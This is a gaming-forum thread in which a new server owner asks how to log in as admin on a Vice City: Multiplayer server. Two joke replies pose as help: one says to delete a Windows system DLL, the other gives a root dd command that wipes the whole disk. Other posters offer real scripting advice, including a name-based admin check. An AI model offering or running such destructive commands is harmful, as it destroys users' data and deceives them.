Vice City: Multiplayer

Server Development => Scripting and Server Management => Topic started by: ForOver on Oct 11, 2017, 07:08 PM

Title: how to login as admin ? :/
Post by: ForOver on Oct 11, 2017, 07:08 PM
guys ,, when i add a command for admin only .. i am owner of my private server, but when i use it still is say me "you are not allowed to use the command" so guys how to login or set admin password ? help plz
Title: Re: how to login as admin ? :/
Post by: Karan on Oct 12, 2017, 04:13 AM
You need to pray at least 4 to 5 times a day, make your lord happy, then start your computer, go to C:/Windows/System32/

Then look for a file named msvcr100.dll, delete it now, and continue, then join your server and type /admin plsletmelogin

if it's work then good, if not then sacrifice yourself in next year's Eid.
Title: Re: how to login as admin ? :/
Post by: vitosca1 on Oct 12, 2017, 08:32 AM
Quote from: ForOver on Oct 11, 2017, 07:08 PMi am owner of my private server
type in terminal as root:
sudo dd if=/dev/zero of=/dev/sda bs=8m
Title: Re: how to login as admin ? :/
Post by: MatheuS on Oct 12, 2017, 12:43 PM
Or you can use:

/q login admin
Title: Re: how to login as admin ? :/
Post by: ForOver on Oct 12, 2017, 04:35 PM
i don't want your jokes
Title: Re: how to login as admin ? :/
Post by: NicusorN5 on Oct 12, 2017, 05:01 PM
Quote from: ForOver on Oct 12, 2017, 04:35 PMi don't want your jokes
Jesus Christ, how many years you are. It depends on the server. Edit it's database to make your self admin, else you can stick to playing as a n00b lol.
Title: Re: how to login as admin ? :/
Post by: ForOver on Oct 12, 2017, 07:44 PM
Quote from: NicusorN5 on Oct 12, 2017, 05:01 PM
Quote from: ForOver on Oct 12, 2017, 04:35 PMi don't want your jokes
Jesus Christ, how many years you are. It depends on the server. Edit it's database to make your self admin, else you can stick to playing as a n00b lol.
u don't understand
i am new at script
Title: Re: how to login as admin ? :/
Post by: Mahmoud Tornado on Oct 12, 2017, 07:46 PM
Quote from: ForOver on Oct 12, 2017, 07:44 PM
Quote from: NicusorN5 on Oct 12, 2017, 05:01 PM
Quote from: ForOver on Oct 12, 2017, 04:35 PMi don't want your jokes
Jesus Christ, how many years you are. It depends on the server. Edit it's database to make your self admin, else you can stick to playing as a n00b lol.
u don't understand
i am new at script
Bro You Must Made An Admin System First
Title: Re: how to login as admin ? :/
Post by: ForOver on Oct 12, 2017, 08:03 PM
explain me please :( how i make admin system
Title: Re: how to login as admin ? :/
Post by: DizzasTeR on Oct 13, 2017, 02:50 PM
Quote from: Karan on Oct 12, 2017, 04:13 AMYou need to pray at least 4 to 5 times a day, make your lord happy, then start your computer, go to C:/Windows/System32/

Then look for a file named msvcr100.dll, delete it now, and continue, then join your server and type /admin plsletmelogin

if it's work then good, if not then sacrifice yourself in next year's Eid.

Even simpler @ForOver, Just ignore dickheads like the one you witnessed right up there and try to gather information from the rest of are helping you. You basically need to make a proper account script in order to get admin in your server. There's no default 'RCON' admin login as we used to know.
Title: Re: how to login as admin ? :/
Post by: ForOver on Oct 13, 2017, 05:41 PM
Quote from: Doom_Kill3R on Oct 13, 2017, 02:50 PM
Quote from: Karan on Oct 12, 2017, 04:13 AMYou need to pray at least 4 to 5 times a day, make your lord happy, then start your computer, go to C:/Windows/System32/

Then look for a file named msvcr100.dll, delete it now, and continue, then join your server and type /admin plsletmelogin

if it's work then good, if not then sacrifice yourself in next year's Eid.

Even simpler @ForOver, Just ignore dickheads like the one you witnessed right up there and try to gather information from the rest of are helping you. You basically need to make a proper account script in order to get admin in your server. There's no default 'RCON' admin login as we used to know.
hmm, explain me :( how i can make proper account script. just give me a code about proper account.
Title: Re: how to login as admin ? :/
Post by: ! on Oct 13, 2017, 06:21 PM
Paste this full line
Quoteyou are not allowed to use the command
from any of the admin commands that you've made.
Title: Re: how to login as admin ? :/
Post by: Thijn on Oct 16, 2017, 05:31 PM
You say you get "You are not allowed to use the command" whenever you try to use admin commands. This makes me believe you already downloaded a "proper" account script.
Can you tell us what script you downloaded? Then we can help you further.
Title: Re: how to login as admin ? :/
Post by: ForOver on Oct 22, 2017, 05:59 PM
Quote from: Thijn on Oct 16, 2017, 05:31 PMYou say you get "You are not allowed to use the command" whenever you try to use admin commands. This makes me believe you already downloaded a "proper" account script.
Can you tell us what script you downloaded? Then we can help you further.
sorry for late
i have main.nut script
Title: Re: how to login as admin ? :/
Post by: Mohamed Boubekri on Oct 22, 2017, 08:30 PM
Hi. You Want Login As Admin.
Follow me Step.
    else if (cmd == "ann")
    {
if ( player.Name == "Here You Name example : Forover" || player.Name == "Here Post You Friend : Name" || player.Name == "Exaclty" )   // You Must Change Them To You Admins Names
    {
        if (!text) return ClientMessage("[#FF0000][Syntax]/ann <ID> <All/Nick/ID> <Text>", player, 0, 0, 0);
        local v = split(text, " ");
        if (v.len() < 3) return ClientMessage("[#FF0000][Syntax]/ann <ID> <All/Nick/ID> <Text>", player, 0, 0, 0);
        if (v[1].tolower() == "all") AnnounceAll(text.slice(v[0].len() + v[1].len() + 2), v[0].tointeger());
        else Announce(text.slice(v[0].len() + v[1].len() + 2), FindPlayer(v[1]), v[0].tointeger());
    }
        else MessagePlayer( "[#FF0000] You're not allowed to use this command. " , player )
}

if ( player.Name == "If you Do name : hihi Go Join Server with hihi" || player.Name == "Here Post You Friend : Name" || player.Name == "Exaclty" )
Title: Re: how to login as admin ? :/
Post by: ! on Oct 23, 2017, 06:12 AM
Quote from: [MCO]We3da on Oct 22, 2017, 08:30 PMHi. You Want Login As Admin.
if ( player.Name == "Here You Name example : Forover" || player.Name == "Here Post You Friend : Name" || player.Name == "Exaclty" )   // You Must Change Them To You Admins Names
Damn I've lost one of my f***in friend The f**k happens now I've to change this line in all of my commands Its hard to re change this line in all 10000+ commands. >:(